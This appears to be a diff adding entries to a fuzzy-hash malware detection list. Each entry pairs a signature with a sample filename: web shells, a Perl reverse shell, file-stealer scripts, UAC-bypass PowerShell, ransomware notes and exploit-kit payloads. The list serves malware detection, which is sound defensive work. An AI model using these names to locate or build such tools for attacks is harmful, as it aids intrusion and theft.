+6144:aR8H+Ag/8KxFwnOXn4F6hBTkYKraREqrpTK4voj29ud/DJ/UyV/6E8XdgpD8xfK:a8H+T0+zE6j8aRXTK4XQJ/U7kQfK,"2016-04-18-C-ProgramData-9A88E103-A20A-4EA5-8636-C73B709A5BF8-thawbrkr.dll"
+6144:aofXjSI6aa1cE/V2d7tYNv15q/LlWK7yzyFhfMTtlaCBfF22Dm4VXk+4:aovjPySIsxYj5bZOLsFfF22Dm4V74,"2016-07-13-pseudoDarkleech-Neutrino-EK-payload-first-run.dll"
+6144:AjHNiZrHFKcJbbfpAzjqjRiyQ2pSWFEKLvEHVAxu1dMv:AjAZ15A6jD/1LvE1OubMv,"2016-03-21-pseudo-Darkleech-Angler-EK-landing-page-after-jacobwirth.com.txt"
+6144:AjHNiZrHFKcJbbfpAzjqjRiyQ2pSWFEKLvEHbu1dMv:AjAZ15A6jD/1LvE7ubMv,"2016-03-21-pseudo-Darkleech-Angler-EK-landing-page-after-wcpconsulting.com.txt"
+6144:AjHNiZrHFKcJbbfpAzjqjRiyQ2pSWFEKLvEH3u1dMv:AjAZ15A6jD/1LvEXubMv,"2016-03-21-other-Angler-EK-landing-page-after-localtasteblog.com.txt"
+6144:7YpIfLxUuydMNT/evbKtEs8coUMxM5w55RnoI5fRnTXE2VuQ0w9jCWH2:JfKu/orCWH2,"xnonymoux_webshell_ver_1.0.php"
+6144:6Q6h3c6CJ8sI1VlJUvB4F1/NNY6iWtSvbrRQUNJY33qI/qDYXZKGvgshf:6js6CSseFNNY6AfY33qI/C8ZKG1,"x0rg_byp4ss.php.txt"
+6144:6gNyFomr/uPe/8WDqTFEqerXSMqKW5Ertelu/zw878vyLfNu8Pz:6gASne/4E/rXSMngE2u/zw879,"2016-06-30-EITest-Neutrino-EK-payload-CryptXXX-after-pekabex.pl.dll"
+6144:5zQLUZPBLa55DzUxGobhUMsSJ2bCNbyR4hrXnu5RjQeh:5zrpJazexaMtpbU4h0R,"2016-06-28-pseudoDarkleech-Neutrino-EK-payload-CryptXXX.dll"
+6144:5vb2HTUkwCpKb+ayIGUvN+xNjw80JGUaM6Q:5aHTPVKqyNOj1pBQ,"2016-08-10-Cerber-decryption-instructions.bmp"
+6144:5eBv4ybOuTvhNZ2PhWakwSAwbiPUuXikW1wvaycpvDfIRTglD:AV4rYvh25WQSDGadfES,"20150903-184352-VeiGzVLEGQ4ABRaNT2YAAAAO"
+6144:4SJ1JyGQUuZrgviP2G7l+5tXCb3MZ3l+OYc:4okGQUudgvBtXCb3MZoO,"2016-06-02-pseudoDarkleech-Angler-EK-payload-CryptXXX-after-mfgsci.com.dll"
+6144:47gZYeD7u3T1FXt4pG1MkzDkOT/L4el7ZZ:si63Dd4pGWWL5z,"20161228-000921-WGK1WPFm3625nk3tGEnK@gAAAI0-file-RB5iDi.133269167"
+6144:47gZYeD7u3T1FXt4pG1MkzDkOT/L4el7ZY:si63Dd4pGWWL5S,"db.php"
+6144:3ZLlbBvEDYccBmUr8cA7VJABiQ5+rzcVu+YAL6BskP6rIkb+6T3i:3ZLlFNyc0VmMQ5ozcuo6BhCrvLT3i,"2016-06-20-EITest-Neutrino-EK-payload-CryptXXX.dll"
+6144:3s5zmwAe4iVvJaDW/K11LaHH+S9qimPS8b597k+k3i5Rn1w0iwYqoZq2:3s5qwyQI+K11+bIBPx5Cb3Kn1w0iwd2,"invoke-BypassUAC.ps1"
+6144:364eMStolrntVo7esZ2e2P2qKNekKVzuJfzhC2fteo36HUp:364eMS6htVEJ2e2P2qKkkKVzuJxT,"injectionv3.txt.001.001.001"
+6144:2VAhR/uld4+is/HLSyuJG+xYotcyeLc7bfiD5cjXnuBBoR:2VAhF+G+4G+xYotFeLc7bfi1cjXn,"ipm_test.php"
+6144:2TDV71tVcGoZkhHu5cPcdZkPf8ssugyITCEtgp0J2PA:2Th7DVcD2OqPf8ssLWwY0U,"2016-04-22-click-fraud-malware-retreived-by-Bedep.dll"
+6144:2F69dFFQCPyzPGU2NkIDTuz48r9P4+yPmwxQMLHnpTdDJ:2F6jFmAyzENkIDDjHpTX,"c100_by_Locus7s.v1.0a.php.txt"
+6144:1Vof0BGjXS8QEmbsr55EWMQLUXgXLUC3IczGa80t:fo8B61QOzbkg/YuGaF,"ljasdjlkshdjflhiurwehiu.php"
+6144:1aVX6Wc4G3D6fbk8oW9qAzma7fwhTjP1ten2:1On9qiPfwJjP1ten2,"2016-03-29-other-Angler-EK-landing-page-after-localtasteblog.com.txt"
+6144:10IChFJJu/K66NtKrN6h5PmM3119CADF73ZxH:WICjJM/PBh6PSADF7nH,"IllusionBot_May2007.zip"
+6144:0F69dFFQYjYhlGKWNEur+ituutFBmKEBkYzwol9bDjJFP:0F6jFmKYhSNEurMzxDjJN,"VirusShare_b7ef3dd2b8e372202a44fce1c5b92047"
+6144:0F69dFFQYjYhlGKWNEurfituutFBmKEBkYzwol9bDjJFs10:0F6jFmKYhSNEurzzxDjJ80,"locus.txt"
+6144:0F69dFFQYjYhlGKWNEurfituutFBmKEBkYzwol9bDjJFpt4:0F6jFmKYhSNEurzzxDjJV4,"Locus7Shell-v.1.0a-beta.php"
+6:0ZycDXNkjy+GYP6eXwSghXPXTSRBLQu4WIx1+X+U+BIegL:7o2OhYXghfAE19U+IRL,"1992fc7d8c9059cb8549ac4e8d439420_php.txt.orig.001.001.001.001.001.001"
+6:0UjPccwi23fofvDTpjIny1R3K4CZAzD5CSdEJ7xgXZyHjz/ggqhR1:0UrwZAfvDljIngkhZicn7xgOofhD,"gtaak3kr.0vz.vbs"
+6:0Uao5Pccwi23fofvDTpjIny1R3K4CZAzD5CSdEJ7U2kZyHj1MPqhQjbn:0UaotwZAfvDljIngkhZicn7UCBPhmn,"zezmigbh.hxq.vbs"
+6:0S+f5Pccwi23fofvDTpjIny1R3K4CZAzD5CSdEJ7v7ZyHjjA3NqhRJV:01lwZAfvDljIngkhZicn7vCfbhvV,"h4lvi4ka.cxo.vbs"
+6:0rwat6JTI2GTx5DFUxz/BjDwgW4h5TRpCLRzM43hcB1w9BujdhcB1wx:2watiTI2KvaxzJj8gW4h3pAQOhujdn,"nuss.php"
+6:0rALOuByNFnWA++a0WshVeALX+zOgD03HsLX+zOgD03HN1i1fQHLy8dM1QP3hnny:0vu4VI+a0ZVtPggaPggNoKG8dOAln5xa,"seo-spam.php"
+6:0rALOuByNFnWA++a0Wsh8H0PPFJVyH0PPsjUdcCrwJKO9uTkzLw:0vu4VI+a0Z8UPPFOUPPXd0UgckzU,"seo-spam2.php"
+6:0JnKVYkWAnYWYJVKX8U4gJuCYP2MtZHbWYyG1KX2XSOVcHMupIxiAakn73Kl:0JKIAnoJVMr4uuCy2Mtdr/M2XS6cHM+j,"sql.cfm"
+6:0JduHdAw1n7VcJwwkVenmzotUNE0aRO18wpM2M80yxMX2NH2WBP3ki4ynSi8IMwG:oduFJ7fv8nm8tfo18RZyGXJWB3MtIm,"579485e484e90652d545fa2322e3f853_php.txt.orig"
+49152:zRWCD0HQHERippcst04EKf39QXrDsllmDpXaNg2:dpD0H8EQcPr2398DMlmDpKNT,"LoexBot1.3_Sep2008.zip"
+49152:zBAxZTr8HUxCFH1uG737wNWBSKdeT83ycCPi3tq+Qq1Nlf9WvGe82:8rpC2WOiB1Nl682,"directory-list-2.3-medium.txt"
+49152:Z4rj6Cow1YdoZSdqeC8ikWH6DAE1ilVDcR:ermCaoWiXE1ilVcR,"directory-list-lowercase-2.3-medium.txt"
+49152:yojiYnHXiqs71KCBl/syiaFs3oX1M/Xxv:yo2YnHSh1KyV6aFHX1yBv,"Trojan.Dropper.Gen.zip"
+49152:URmlx4WgVfg25F9GGGZQ5lzpkN6plMX5r9J9xQ2ApL0LKyNO5akLSsRb63eCNGCD:URmlqWg3F92CzplYP99AOd6Ssx8N+W,"ACat-附数据库驱动-jdk1.5.jar"
+49152:txxY0etvo4rwGDXV/4/Wz5NNoRTfgrKQd1ehBEH5hyUjAZNIDRX/68pyx9H:tc9MGR4uFvoTfgrLbWQ7yUaedi8pal,"Unreal3.2.10.1.tar.gz"
+49152:pmRkTADhN5ulDigt8pri+kxs9/z/pH+3h:pmRulu48p2VU/z/S,"njRAT-v0.6.4.zip"
+49152:ngFLBo0deMdny3IcDvcG6s54EfRpe8ZLm:gFlEqvWcZsVf3U,"PHP.7z"
+49152:krnBJT8K+yB8PDo9wERXE9z07D6yAf+DkvrYbbrgTrzE2fNqycJYninbT91N0iqu:krnBF8KkDonsz0D5MYjgoQJnibzNEu,"ACat-附数据库驱动.jar"
+49152:IICRTEUAhWG1q+WPc7L9aIuiaIgaI3Lf4mG:aEUAhWG1qc,"1r99asmkjy-database-backup-1483203901.sql.327197894"
+49152:hhft8gtmRDSYOFTIXtkS3DEJkFjmUuSSPeyFTL1YtU:PCgI5SH08Yj3uzhlYtU,"Win32.Remhead.zip"
+49152:gfRF5KBmZSzpBgC2Zuoik0Kpc1PYe1laMyh8:gfRF5KBmozpBgC2Zuoik0Kpc1PYe1laA,"2016-07-05-Cerber-decryption-instructions.bmp"
+49152:F4qJ66i36Z+unHRUxh+bFHO6etEeudS3vdsHu+CL3PxYQRFP:C463OxUxI46etEHdSeHu+kYaV,"Grum.zip"
+49152:bNihhOhBNhKhyu7cYx9z2rAnKsfRUaFyZB5Ss5+Nu:5ihhOhBNhKhRwwJ2roGaFyZB5Ss5+Nu,"smss.pl"
+49152:aKNKUsP+CbCHhfiw+vmHcND3FHG93mLR6:aKNKUsP+CbCHhfiZvicND1HG93mV6,"2016-07-25-Cerber-decryption-instructions.bmp"
+49152:aeJoH0jHb9s2Vb5GOVZOke8KeAC3oQJj2cXU:aeJoH0jHb9s2Vb5Geoke8KeAC3oQJtXU,"2016-06-25-Cerber-decryption-instructions.bmp"
+49152:7lzO5MCEcRPOmqeWozDQvPFq1IYRJRyYkUCJrWVnrxjSYdl:wNEcRPDPq8IYrRyY/CJsnr9SYdl,"Dyre.zip"
+48:ZxBQ+9AyfFUgkN/PWNw0hWM9yoMwNwRGLEdL9NmWzicZ9i4bqikqxnavizG20mnj:ZxO7yfWgkZPWuqWMAlwi9NmWic7i4miD,"email.php"
+48:Zvtmk8jxr28ktxXpdh6uxxVxnzqAAQTSB0ndeMWUIIjcBBIU58FS5xAnPv4t:Zvtmk81SvxX/h6O/dzjTSSnEMWUFjcAk,"Java Shell.java"
+48:zU/4fvor6m03qiBms9PVe/ZIUgSMu5PvWd/3QCh/YMMWKiT8MID/4:pYxwBdDyZIUXMZd3QC3dT8dE,"guige.jsp"
+48:ZTjMiiSHNSAOi27dtjnm+iBGIxVqVeaTE:ZTjMQOiiTLm+iBGkUVO,"0.php"
+48:ZPCFE/b/3NO0xuX96gn64vGR2Qjwr9Tu71v915e2yHAOg5DKwSpj36njLxA9nhVH:J7NBEL64vGR2Qjwr9ahv9GdHg4wSpWju,"redirect10.php.001.001"
+48:ZoQ5AxmHdycDEC/EuAzFuaSw/8O+S8FEYif1mWGzNWDZOLZKp:ZoQ5AxmfDT/IfB8HS8F3ifjG5WDiw,"udp-flood.php"
+48:ZNswY6OpZaSX9YSx65MnDVyGbM5anrMj7cxttYolR0VJdV49PYyk8x:q64aSDcqDVyGbM0nYj7Ot/lRsJdY88x,"1.php.orig"
+48:zhSpFKocdhL7NPRSlUt53JacBYpeuTjDAg9Ld9xFXv7/Nidrq:VCcdRz5530cBdAhzxFXvjNidu,"Parse_Keys.ps1"
+48:zfooAd5////////////////////////////////////////////sL:bgd5///////////////////////////c,"wooyun2015052301.aspx"
+48:zfokd5////////////////////////////////////////////sL:bNd5///////////////////////////c,"w02.asp"
+48:ZfNKR3vDsObKsV+LDUZsXIYu8cgKPNXAYfuFZ+yl:bKCObLiD3XargiXj05,"Backdoor.ASP.Ace.e.asp"
+48:Z2dWRzbz04TMK0AdzszYLkH8KDU8iGf1A+xYbTAFKAMzrzlzSz8DKWOZ4KwmLuX:ZFz304T00QDHKPf+xQMPwn9K8nOZqmY,"NCC_Shell_by_Silver.v1.0.php.txt"
+48:Z2dWRzbz04TMK0AdzszYLkH8KDU8iGf1A+xYbTAFKAMzrzlzSz8DKWOZ4KwmLuLc:ZFz304T00QDHKPf+xQMPwn9K8nOZqmo+,"NCC-Shell.txt.001"
+48:YWD40posyT2xOZU1HqExm6khFg6/+df9Q50yCCR20XBYQ0PyeTXbPp9YO9YMV5+A:yI1KExmFrv/+bQIeyt9YO9Yg55,"EasyZip.class.php"
+48:YUr4kBDueHeQlAE/cA5p8JmGTWAZwQlAz/D3D5Lh4:YWj+EdCLSKwjL3Dp6,"db0a2a7d9a71db968537a3a02281acd4_php.txt"
+48:yR6qjpiEC7WHez37UFTLksCMqUTHGdAUWhHBR+FfskMUAy18IgvBxU0pJP1kRfqe:J0v23QFHkXMvt3HkfskMUA1hU0BkRfqe,"2016-07-08-EITest-flash-redirector-from-fin7.tk.swf"
+48:YQw85ti82sKSpAyzJlSGloYOgN/Zex9VcQ7lvPX1bY78FZELh4VeZjSxWIlIXv:HY3qP36xwQ7NlY8FZENce1wWIlIXv,"h4ntu_shell_[powered_by_tsoi].txt"
+48:YQw85ti82sKSpAyzJlSGloYOgN/Zex9VcQ7lvPX1bY78FZELh4VeZjg:HY3qP36xwQ7NlY8FZENce1g,"h4ntu_shell_by_tsoi.v1.0.php.txt"
+48:ynTNB8H4g92cuvcX8ibcS+/mmHEqueIeJqj0/v1WU6yGG36xNW:4kR92cuvcjcl/7uhv0/9F7uW,"cmd提权马.asp"
+48:Yno/3CQ8f07Y8wTcv1bAGYEd7TfJ+vA4fi43RhQtQ:TUc7RvuLyfIvA/43RhQi,"Backdoor.ASP.FileUpload.a.免杀小马美化版.asp"
+48:YmCr9vMQ/MQM3flYsCq6YoWAD5OnMiEEoVCbGSSGX3OlVrI2EN:YNrdb/bM36sCqLoW+gnMgoVCbGSSGnO+,"php_HTTP代理.ccc"
+48:ymbWixJeqjUF8wWs5Se24R7Ll0VsAHddcxN14yYyzSLNV4j:1UR24R7hyJ9dy14yYQy8,"petx.jpg.2"
+48:YGuDDB2V7Af33AXxvTvcu8VCJViqetwg+QdDq5mj:huD9yg3AxvTvACetwg+QdDqQj,"dang.txt??"
+48:Yfdtwj1HINujdcFyFMjK47H5EZpvRyqqw7VJSa35:0PwRHINujVMjr7H2jtqw7map,"wp-login.php.1"
+48:yekhGicqP+ttnZaio3rDD2j+dBdU8Qs/hQCe2va4EHnVpeZFbWVXZg28UuIyALnI:ohL1e/aN3rDCid7UTsu56+ZOaXSU0J,"2017-02-22-pseudoDarkleech-Rig-EK-landing-page.txt"
+48:ydtwj1HINuidcFyFMH47H5EZpvRyqqw7VJSa3D:yPwRHINuiVMY7H2jtqw7maz,"wp-login.php"
+48:YAKG3mmXO0VdlL7GIXebnwbSDaRIZfh07gUsN8CxXXehVAxJF0Bp:o4dO0dlnXecbSeRorJmCxH4Sk/,"26e7f13243ee5991caa62bcee75453f2_php.txt"
+48:Y/81XW4hlzUKXKDkeilB3eie+RiK2rM523:Y/8jFUK6Dke+Bex+z23,"switft.php"
+48:Y2U0A0sWAFH+98f601dui3fVzZugkdcFyFMjK47H5EZpvRyqqw7VJSa35:PUBLY9A1DPTLkVMjr7H2jtqw7map,"indeks.php.1"
+48:XRNgkeoaq8hHD0sTvQZoSjbONZtT9QvhvGQKQy625uaq5i86kK6lAj7fZ6Cr3J/l:h+kWhYsMJe/OsQKQyrHs5K6OjLZ6Cr3f,"xshock-0.1.tar.gz"
+48:XPHpl7j/sMzpNK/n5oIXT0GqR2tt5i/MUslYmDGyJmlQuYSfp/GWjx+7Bjx+RIjh:XzjkUA9XT0GFBlDu/nxWlx8+xfn,"history_6642.js"
+48:XNxPtMyw2dmA5yJzrqK2Qm+5JomFsmCH8NimcdK7OPn:XNrdLmAaqG5JomF7CcNimcdKKPn,"readme.md"
+48:XJ13DVCUYbwT+H0K38YPEnGtVwT3El77sgtTog8pb9H8Ptuz12R6moRyOClkBSdo:LDshUKsxYl77ssohb58Vl6mZeBS/gU7e,"phpspy_v1.5.htm"
+48:xgUPvJpDDIFJ7Kg4xuTe8yzyAIjnYY5TW0P9opH6dX1x/CVQSYAdi1Q5AFGn:V/DMFJ+g4xqe8uyjCy9k6S1diEn,"2fa31f4dd9ba365f4609c4a854e46a5e_php.txt"
+48:xgUPvJpDDI+272g4x9yXe8yzyAIjnYY5TW0P9opH6dX1x/CVQSYAdi1Q5AFGn:V/DM+26g4xkXe8uyjCy9k6S1diEn,"d7701017bf039c4f8d3f2e2301881343_php.txt"
+48:xgUGvJpDDI+2+q2g4xEbe8yzyAIjnYY5TW0P9opH6dX1x/CVQSYAKi1QsFGUYn:s/DM+2+pg4x0e8uyjCy9k6S1KiiFn,"1c9698f513a1fd5713e65d3bea17ec65_php.txt"
+48:XF/rnZvj9AXdBmWvjJEwR0s04+aT84fPwy3ueb+x7T8xFOvaEOUO3kgecDpjw:VznENHvjCwR0s0DXGjuOWgxFOiEOD38n,"sshback-v0.1.tar.gz"
+48:Xcyf77wULg7HHySqWKVwTez63dFyfxJA9FK/1V7Qo7mRuGT06KzhQDkjZwpVU3Fe:syfQm6SdlVIee3reMoWOrwpK3fhid,"rip-git.pl"
+48:X9VFmI9ZavZVPD5VqqxZRfZkl0ZktgvRZOZGCvZoEHZ2ZTYZwe/ZdZgPWahgpfnN:X978BwCuwRKgpKKhVNyBz7,"2016-07-14-Afraidgate-Locky-decrypt-instructions.html"
+48:x4BPZ5ijyUjHCo1HRIpwSVHmIb3RMVIDJ4VQV/n4MYc+gnIAqiK9rjVB4TyEKICG:gmfjiF31fDJiQ4MlnIAQB4TyEK/28EvP,"perlwebshell.cgi"
+48:Wz3e325UQFJFDQ17UB5ab8LA6ddVayVCCZ:W7+GtJ2U7abABPaaCu,"FireBuster.ps1"
+48:wycgF8LC71zFrZ40fCSrZ43t0NQsPal0j0f0i0c5rgzFbDLIkX3t01l0j0f0b0cd:pjrNc3X32UJUWA+iKw+nw,"B20062016.js"
+48:WW1NehskSq0/QqeCh2fgYM2Riw2G8Sw5bHG43sQsIQNnSn:BB4qbyS2RBgh3JIS,"ReadMe.txt"
+48:wJuwKvph1RU0gHD6+v3UYoTpr5KqBAL/jpSI3:4uwUpvRo6+PZY1ALVSq,"section-mal.php"
+48:wJd8JeFmqVmyHHdctlJSSKQNu88fZm1ra5C3xo0ot1XTAckhRnuWTp5FUaRv3H2z:S0ecl93s5oraEB7Bw2hBFsuW,"asp小马.asp"
+48:wJd8JeFmqVmyHHdctlJSSKQNu88fZm1ra5C3xo0ot1XTAckhRnuWTp5FUaRv3H2P:S0ecl93s5oraEB7Bw2hBFswE,"旁注 - 网站小助手.asp"
+48:wJd8JeFmqVmyHHdctlJSSKQNu88fZm1ra5C3xo0ot1XTAckhRnuWTp5FUaRv3H2H:S0ecl93s5oraEB7Bw2hBFsCW,"拿站小助手-经典Asp小马.asp"
+48:WIk+rzrdgyebetoOrjSsnLCoLuSrFWEJsSAyd0e25HdKFdUWfR+0lo:WUVtRiSrm9YSsRfo,"readme.md"
+48:wIJkEz40dNe3QpvEJIa808inA7N3hrB2SqbW:wykElvAIew00,"PerlKit_file_manager.v0.1.pl.txt"
+48:WhyvQSRwf8rLMh78IpDemyKnXdgtU1gxU9TOPoBZXlDYeNyGENkfhswrSIkUpqG:WMjaT8IVSAdgtU1gkTBDXA3Ah1jkUpR,"config.py.orig"
+48:wH1fHrBt1q6hk1NB101CfopJkJw/Vmb1Jnw6lVMuqYaTBaW:wVfF2IiNPSuo4kmb1WghqYaTEW,"foon"
+48:W9wAMHpCmBwSmUGW+Vl0y/GenIHwwDIrMwT3q:W9wHHpXBwhUi4benIHwwoMK3q,"52522c3d2f9dfd055868bad33fd1446a_php.txt"
+48:vR4BvzF8GEdYz9AK5Ay3mSjBPqfSYoMKP:J4Mv49AYnmSLM2,"dc.pl"
+48:vR1Iw6zqgY7ajZ8RtVaVes+2Q8WpfQaGaBo/VBt0QGOC:Z1IRqgYWj2i3U8WpordBtPGh,"2016-02-26-TeslaCrypt-Decrypt-instructions-after-hscteam.com.txt"
+48:vR1I+tvqgY7ajZ8RtVaVes+p8I9pfQaGaBo/VBt7ZMOC:Z1I+VqgYWj2i368+pordBt7Sh,"2016-03-01-TelsaCrypt-decrypt-instructions-after-nowpdp.org.txt"
+48:vR1I+tnqgY7ajZ8RtVaVes+2vfQMaoL/sPf+7qC:Z1I+5qgYWj2i3LvowUPf2d,"2016-03-04-TelsaCrypt-decrypt-instructions-all-samples.txt"
+48:vR1I+tnqgY7ajZ8RnV8VesnvWE1kefQMaoLm7Pfnv9EXkSn:Z1I+5qgYWj2+3nvWE1keowm7Pfnv9EXH,"2016-03-07-TeslaCrypt-decrypt-instructions-after-dstewartsales.com.txt"
+48:vR1I+tnqgY7ajZ8RnV8VesnSdwIfQMaoL/sPfnSKWFC:Z1I+5qgYWj2+3nSdHowUPfnSK5,"2016-03-07-TeslaCrypt-decrypt-instructions-after-vediaud.net.txt"
+48:vR1I+tnqgY7ajZ8RnV8VesnSDadpfQMaoL/sPfnSAId2C:Z1I+5qgYWj2+3nSDadpowUPfnSAIdp,"2016-03-07-TeslaCrypt-decrypt-instructions-after-automufflersbrakes.com.txt"
+48:vR1I6SqgY7ajZ8RtVaVes+C85AlpfQaGaBo/VBtU0jlOC:Z1ItqgYWj2i3d85ypordBtU0Bh,"2016-02-24-TeslaCrypt-decrypt-instructions-after-Angler-EK.txt"
+48:voco45JAaxmfIYB0ryrZhdDyIY2kg7vYixGyxdUpAr:v9mfIy0ryrZfHbg0dU6r,"google.php"
+48:VnDFks7if9jX0WA7yUsb5BKj8em8BCBUVhq3KHAIEQIh9keBmwZBrQ0QjtRu9fsA:8s7if9jkdGXKFdUBUjq3tLP9keBFZBQ6,"redirect.php.001.001"
+48:VgU0UQlz6SzRMHsZYoLnbHsnin6MQLRqGRninT4hA:lDYRsyV3QbL8GQnTL,"PHP批量挂马.ccc"
+48:VchF8ho61N4d3Q2mQ2ivvbjXl9UyvbYBP:Vc8hu1SunbjXnUyMBP,"animal_shell_poc.php"
+48:v30uERAbmGNjzt9uPBShV4O6Kr0WGrSShfvyhR5cATzO+rj23Npqj:PvEGmGNjze6VKH3Vhy5cuO+n23y,"图片马.jpg"
+48:V2cDkXMeP6Z8RJXZuMU5jxsovbGFAb9ZuzgJSLPtmYXdX7F:DDCMm4ITU5dgFApEEJSLPQkLF,"readme.md"
+48:UZ40gyoa9RstIizirl6FuthPn18FTK7SeKZg7Ai:UZ43y2PziEFuLmxK7X1ci,"injek.php"
+48:UWvtApqEYBw627yk27iq/NGl4b11L3v27b227K6SC0IZXaDAbzj0alDJWBo:Z8xYBDi7ii+GlcB3vi6iK61ZXjYy,"xm1rpc.php"
+48:UVhM5+izyAoKkyUjHTY4+4y0JEpYiFsoQ6ldLLag58lBlRbbK+aflOQ4zOXb7:UVC5mAZ0Tq0SFsoQ6ldaTXlUbdN,"perl-reverse-shell.pl"
+48:ul6U+Bh3Vls5XfxKJT5Cl9F6t0tTsLBo+kiAkYdkeak6PlaoBhXp9tZa3BdByblW:4IVl2QikwZant/BtIfB02FN,"phpft-phpFilesThief.php"
+48:uK8/qIStNIZS0FHyfwl9OzKpBc8S85vHlqQcRuIVlg+1dPgE:Z8CISUZ1FHnnpC8S85vHlqQcRuKvjB,"pwhash.php"
+48:uJohJqtJZJEN58JSZJ0JqtJZJEN58JTSSuDJVhJXtJsJFN53JLmJ3JvtJ0J9N5Pv:yG1mL6ki3eh+rseOjaGlNA,"kan.log-perl-exec-dec.php"
+48:ui4iTcKZ/CE5uwCE5J4cCcvvFFUxC4KoP9Xt8OP9hFCqFP92c1gmiEAUP9v11miG:uUtKEsE6AexC3WDNpCqR4UzXr80HCMA,"xl.cfm"
+48:uFLm54tT6+d1sNT50mR4+ftEGJ/q106SfL7J4L:u3d6O14T5087ftEGq1aiL,"DefaceKeeper_0.2.php.txt"
+48:U8CnZwQd+Ic7Y+QMJQEa8r61xMioidkKVn/r5JB5jAt7CBwBcqk1PSNGhx:GZxkL7SnauMfQNJPjnClk1Pie,"JSP_KIT_upload_win32_by_unknkown.jsp.txt"
+48:u2NfGyZ/5QSO6JOA/Q9Y9P6g6t/hrRlA6mzLt3BD/gpUQMEnqOElvfMN3msb9YUt:jNf1Hi6Hx16zRTmz5BD/gdJ2sk8hr,"4c3ccacde29c8b96a7291883b7f5e998_php.txt.prog"
+48:tvprN2XG9X9Oz53LZak2ol1bRxa/UaT739kiDviELhz7S:/5+GdRCrxa8aT7j5Lhz7S,"Invoke-Decode.ps1"
+48:tRQFsfZWhfU2OhPahMW1aI4r0/lDKSzZjcdRcEc5xmgBp9mn:tmFegFUphPahXV4rmlDKSjAPc7mgBrm,"obfusc1_php.tpl"
+48:TP1KjzR5+MTHimb7u2DgxgLfAsTFd0PAmKJh//mPjHZ7BtaDBJRdN1/AC4:T4XR0GRnzrX70PHKJh3m7OBzd7V4,"Exec_Calc.ps1"
+48:TMbUhJ6RklVTt4w404j6tfCzX56E27mSKdia:jAevfwEUZ,"279d7537260fda6b9d8cc612d133faad_php.txt.orig"
+48:TLsSbky9lBWQ/CVkQjWOqpDf8I1uqpDv9e9+98OA6OoJO1TMTuHLDvY1VwnyGXCA:8PKlBWQ/CVkQjWlB0I1Fho9+97Al71ES,"196757b63b2bb12c09029dc5a9f20904_php.txt"
+48:TL1Jk/AQ1HIU1HFwLGL9thQj7r47ZWMHAhUPk3o6+MTDimb7yRTj2XvnaaST:H11EIwFs+9QjPmAhz4xGVoivaaK,"Execute-DNSTXT-Code.ps1"
+48:t+jq89SvePzCKXpT0VlKtkVA/wyNwwp4DNwUow1twSPyOWSs/TkQlB2N2ZzeRDig:cIPlwpHYTKf71ePJccGjHpSHl91N,"2016-07-19-Afraidgate-Locky-decryption-instructions.html"
+48:tEj0z/ANbjgzT8K/ANd4qqpsKsuKkR2qkI0xpAasuKkR2qkIgxtgxvYLr54:1/BL/+qpsgT6pXTWtaAr54,"catjsp.md"
+48:T96i/5SYctFK8JenJCiugh9H2dKjdPLiTz7x7WENf:T96i/wYctrJeJCoD2dKhP4c8,"bad.txt.001"
+48:SZEA1f4Xe6kZyiQkYit6My7FC+ASyVllzkOoWWYxZRDwkDvdUGO6g4GYCK+:SZffa+Zyiui+nI/o4G8+,"6ca08b1393154d5b83d1f9d9cd1301d8_php.txt"
+48:sxMkfxdES/wGJc/zCW4mZndsJdQvEdWA00KgV+I6IzIWnZWfIGKqhT3ThKfTj:sfJp1mZnadtWA00H6IZnZW5tsfTj,"redirect12.php.001.001"
+48:sSMEpDTIeXqryFxc7arBrMvAImcE2dH20qpHyBSs/324LHo4R:vrDcea2FxcurBraIcNs4II,"Ada-Yang-Inject-dec.php"
+48:srYD/ZNYlggDtXZNsq83i6xrDswZxje4mz27WEp:MOFItbTQnFZAQ7/,"UpServlet.java"
+48:SriXvr/rhraprgzrXGrorwyrCvrsrPrbsrwrqQb1Af/r9rsHr+vrBrS5ryr5rArX:SriXvr/rhrWrOr2ror7rersrPrbsrwrb,"sharepoint.txt"
+48:sQxOPT7Or4nENTNcjpbEMU1XGQieDwcKKhhNhWOLlOR/H8seDuk1KW+oWUjCZNqA:sQxOL72wMTHZVB+wPYMdu/v33Q5F+,"2016-05-31-Locky_HELP_instructions.html"
+48:sp6N60y0U0mubyfsiZtvq23qwYxkqWLfE9mJ1vQAR22ML8YhYDePvi170Kpz:/NC0Px2fsiLq23qwY6qWLfEEn4A68Yen,"jsp wget drag database.jsp.txt"
+48:smXs5kwRiWCTmvXr8I6b5Pnm0W6Iuy+0Z:mewRQmvXk5PnmTuy+2,"cmdexec.aspx"
+48:siQNPyFlOOIXpDddsfp6uiBqZEUscT43Nv8M7Izzxu00hNDlcu5:MqFl85u3MYW357gJ+/c2,"ListServlet.class"
+48:seeeeeeeeKsR1I6SqgY7JZ8XVaVes+TPh8hTqpfQaGaB7nIVBtxPhWuq1I/d:E1ItqgY1L3MPh8JqpoQqBtxPhJqO,"Recovery+jyvdq.txt"
+48:seeeeeeeeKsR1I6SqgY7JZ8XVaVes++N8xxHpfQaGaB7oSVBtMNFxHiS/d:E1ItqgY1L3b8xZpoQbBtgFZR,"2016-02-09-help_recover_instructions.TXT"
+48:seeeeeeeeKsR1I6SqgY7JZ8XVaVes+h8xxHpfQaGaB7nIVBtbFxH1I/d:E1ItqgY1L3I8xZpoQqBtbFZO,"2016-02-11_H_e_l_p_RECOVER_INSTRUCTIONS+acg.txt"
+48:seeeeeeeeKsR1I6SqgY7JZ8vVaVes+P8NpYpfQaGaBJjbVBtdgpLZ/F:E1ItqgY1/3c87YpoUjxBtdQLH,"2016-01-26-TeslaCrypt-sample-1-of-2-after-EITest-Angler-EK-help_recover_instructions.txt"
+48:seeeeeeeeKsR1I6SqgY7JZ8vVaVes+LW859XWgfQaGaBJbVBt1Ww9CWdm/U:E1ItqgY1/3gW859XWgoUxBt1Ww9CWP,"2016-01-26-TeslaCrypt-sample-2-of-2-after-EITest-Angler-EK-help_recover_instructions.txt"
+48:seeeeeeeeKsR1I6SqgY7ajZ8RtVaVes+X8pDJwdpfQaGaB7nIVBc4pe2JwdZqoZQ:E1ItqgYWj2i3u8D8poQqBRpx8Q,"Recovery+issvi.txt"
+48:seeeeeeeeKsR1I6SqgY7ajZ8RtVaVes+sl8aldGyfQaGaB7nIVBtulpldR/oad:E1ItqgYWj2i3D8afGyoQqBtMpfRj,"2016-02-22-TeslaCrypt-decrypt-instructions-after-naplesbug.com.txt"
